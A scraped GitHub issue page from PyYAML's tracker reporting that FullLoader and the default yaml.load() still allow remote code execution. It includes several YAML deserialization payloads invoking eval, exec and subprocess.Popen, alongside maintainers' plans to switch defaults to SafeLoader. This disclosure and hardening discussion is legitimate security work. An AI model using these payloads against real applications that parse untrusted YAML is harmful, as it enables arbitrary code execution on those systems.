.load() and FullLoader still vulnerable to fairly trivial RCE

As of 5.3.1, .load() defaults to FullLoader, and FullLoader is still vulnerable to RCE when run on untrusted input. As the example payloads below demonstrate, #386 was not enough to fix this issue.

Some example payloads:

!!python/object/new:tuple
- !!python/object/new:map
  - !!python/name:eval
  - [ "RCE_HERE" ]

!!python/object/new:type
  args: ["z", !!python/tuple [], {"extend": !!python/name:exec }]
  listitems: "RCE_HERE"

- !!python/object/new:str
    args: []
    state: !!python/tuple
    - "RCE_HERE"
    - !!python/object/new:staticmethod
      args: [0]
      state:
        update: !!python/name:exec
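
To make the first payload easier to follow, here is a rough plain-Python sketch of the objects it asks the loader to build. It assumes the loader turns a `!!python/object/new:X` sequence into `X.__new__(X, *args)`; the harmless expression `"1 + 1"` stands in for `RCE_HERE`, and `traced_eval` is a hypothetical wrapper added only to show when the call happens.

```python
# Harmless stand-in for the "RCE_HERE" string in the payload.
expression = "1 + 1"

calls = []  # records every string that reaches eval


def traced_eval(source):
    """Hypothetical wrapper around eval so the call order is visible."""
    calls.append(source)
    return eval(source)


# Inner node: !!python/object/new:map with [eval, [expression]].
# A map object is lazy, so nothing has been evaluated at this point.
lazy = map.__new__(map, traced_eval, [expression])
ran_before = list(calls)

# Outer node: !!python/object/new:tuple consumes the iterator,
# and that consumption is what finally invokes eval.
result = tuple.__new__(tuple, lazy)

print(ran_before)  # []
print(calls)       # ['1 + 1']
print(result)      # (2,)
```

The point of the sketch is that no single step looks like a function call: the code runs as a side effect of one built-in type consuming another.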

I do not believe this is entirely fixable unless PyYAML decides to use secure defaults and makes .load() equivalent to .safe_load() (#5).

FullLoader should probably be removed, as I don’t see the purpose of it.
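
For readers who want to check their own code, a minimal sketch of the safe path follows. It assumes PyYAML is installed; `safe_load_or_reject` and the sample documents are hypothetical names made up for this illustration, and the payload is the first example from above with a harmless expression in place of `RCE_HERE`.

```python
def safe_load_or_reject(document):
    """Parse YAML with SafeLoader.

    Returns (data, None) on success or (None, error_message) if the
    document is rejected.
    """
    import yaml  # PyYAML (third-party); imported lazily so the sketch stays self-contained

    try:
        return yaml.safe_load(document), None
    except yaml.YAMLError as exc:
        # SafeLoader has no constructor for python/* tags, so documents
        # that use them end up here instead of being instantiated.
        return None, str(exc)


# First payload from the issue, with a harmless expression as a stand-in.
payload = (
    "!!python/object/new:tuple\n"
    "- !!python/object/new:map\n"
    "  - !!python/name:eval\n"
    '  - [ "1 + 1" ]\n'
)
```

Calling `safe_load_or_reject("retries: 3")` should return the parsed mapping and no error, while `safe_load_or_reject(payload)` should return `None` together with an error message, because the python-specific tags are not recognized by SafeLoader.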

Issue Analytics

  • State: closed
  • Created 3 years ago
  • Reactions: 12
  • Comments: 44 (30 by maintainers)

Top GitHub Comments

22 reactions
ingydotnet commented, Sep 22, 2020

https://github.com/yaml/pyyaml/wiki/PyYAML-yaml.load(input)-Deprecation has been updated.

Moving forward:

5.4:

  • Address known exploits in FullLoader
  • Default for load remains FullLoader
  • Update wiki page again.

6.0:

  • Default loader for load will be switched to SafeLoader
  • A new wiki page for load usage will be made
  • Error messages from SafeLoader (that were likely caused by the switch) will point to the new wiki page.
  • SafeLoader will be extended to load tuples (and other common data that can be loaded safely).
  • Loaders will be BaseLoader, SafeLoader and PickleLoader
  • UnsafeLoader will be same as PickleLoader but deprecated
  • FullLoader will be same or close to SafeLoader and will be deprecated.

This is the rough plan. I’ll start working on the 5.4 release this week. See https://github.com/yaml/pyyaml/projects/5

Comments welcome.

17 reactions
arxenix commented, Jul 24, 2020

@ingydotnet It’s still possible to get arbitrary code execution with only !!python/object/new, BTW:

!!python/object/new:tuple [!!python/object/new:map [!!python/object/new:type [!!python/object/new:subprocess.Popen {}], ['ls']]]

Ultimately, it’s your choice what you decide to do with the library, but let me state my opinions.

I definitely have seen projects in the wild that are loading YAML via yaml.load() from untrusted sources. I can’t disclose specific names but one example is a web portal that allowed users to upload YAML config files, and then loaded them. Given some time, I could probably find several on GitHub if you would like.

Developers tend to be lazy; no one wants to read the docs. This is why it’s important to follow the principle of having secure defaults. It’s important for a library to attempt to protect its users (even if they don’t read :p)

Here’s a quote from the ReactJS (popular Facebook-made frontend library) documentation which explains their reasoning for their function dangerouslySetInnerHTML. I wholeheartedly agree with them.

Improper use of the innerHTML can open you up to a cross-site scripting (XSS) attack. Sanitizing user input for display is notoriously error-prone, and failure to properly sanitize is one of the leading causes of web vulnerabilities on the internet.

Our design philosophy is that it should be “easy” to make things safe, and developers should explicitly state their intent when performing “unsafe” operations. The prop name dangerouslySetInnerHTML is intentionally chosen to be frightening, and the prop value (an object instead of a string) can be used to indicate sanitized data.

After fully understanding the security ramifications and properly sanitizing the data, create a new object containing only the key __html and your sanitized data as the value.

My observation is that the mental model many developers have of YAML is that it’s a simple data interchange format exactly like JSON, not a complex serialization language. In the same way they don’t expect json.load() to lead to code execution, they don’t expect yaml.load() to lead to code execution.

I also believe that it is okay to break backwards compatibility in favor of security. How many people are really relying on PyYAML’s ability to serialize complex objects? I don’t have too much insight into this, but my thoughts are – not many.

From some quick GitHub code search results, there are ~762k files that use PyYAML. Of those, up to 529k files currently use the default FullLoader as the loading mechanism, which is vulnerable to arbitrary code execution; 220k call safe_load or specify SafeLoader; and only 13k explicitly use unsafe_load or specify UnsafeLoader.
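
As a quick sanity check on those numbers, the shares can be worked out as below. This is only arithmetic on the rounded counts quoted above (the 529k figure is an upper bound), and the dictionary labels are my own shorthand.

```python
# Rounded file counts quoted from the code search; "default load()" is an upper bound.
counts = {
    "default load()": 529_000,
    "safe_load / SafeLoader": 220_000,
    "unsafe_load / UnsafeLoader": 13_000,
}

total = sum(counts.values())

# Share of each usage pattern as a percentage of all files found.
shares = {label: round(100 * n / total, 1) for label, n in counts.items()}

print(total)   # 762000
print(shares)  # {'default load()': 69.4, 'safe_load / SafeLoader': 28.9, 'unsafe_load / UnsafeLoader': 1.7}
```

So, by these counts, fewer than 2% of files opt into unsafe loading explicitly, while up to roughly two thirds get it by default.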

Top Results From Across the Web

CVE-2020-14343 | Vulnerability Database - Debricked
A vulnerability was discovered in the PyYAML library in versions before 5.4, wh. ... .load() and FullLoader still vulnerable to fairly trivial RCE...

Debian Bug report logs - #966233 pyyaml: CVE-2020-14343
CVE-2020-14343[0]: | .load() and FullLoader still vulnerable to fairly trivial RCE The CVE is for an incomplete fix of CVE-2020-1747, ...

Bug#966233: pyyaml: CVE-2020-14343
The following vulnerability was published for pyyaml. CVE-2020-14343[0]: | .load() and FullLoader still vulnerable to fairly trivial RCE

Bug#966233: marked as done (pyyaml: CVE-2020-14343)
CVE-2020-14343[0]: | .load() and FullLoader still vulnerable to fairly trivial RCE The CVE is for an incomplete fix of CVE-2020-1747, see [1]....

CVE-2020-14343 - Twitter Search / Twitter
Another exercise: CVE-2020-14343 on a RCE via PyYAML: ... .load() and FullLoader still vulnerable to fairly trivial RCE · Issue #420 · yaml/pyyaml....
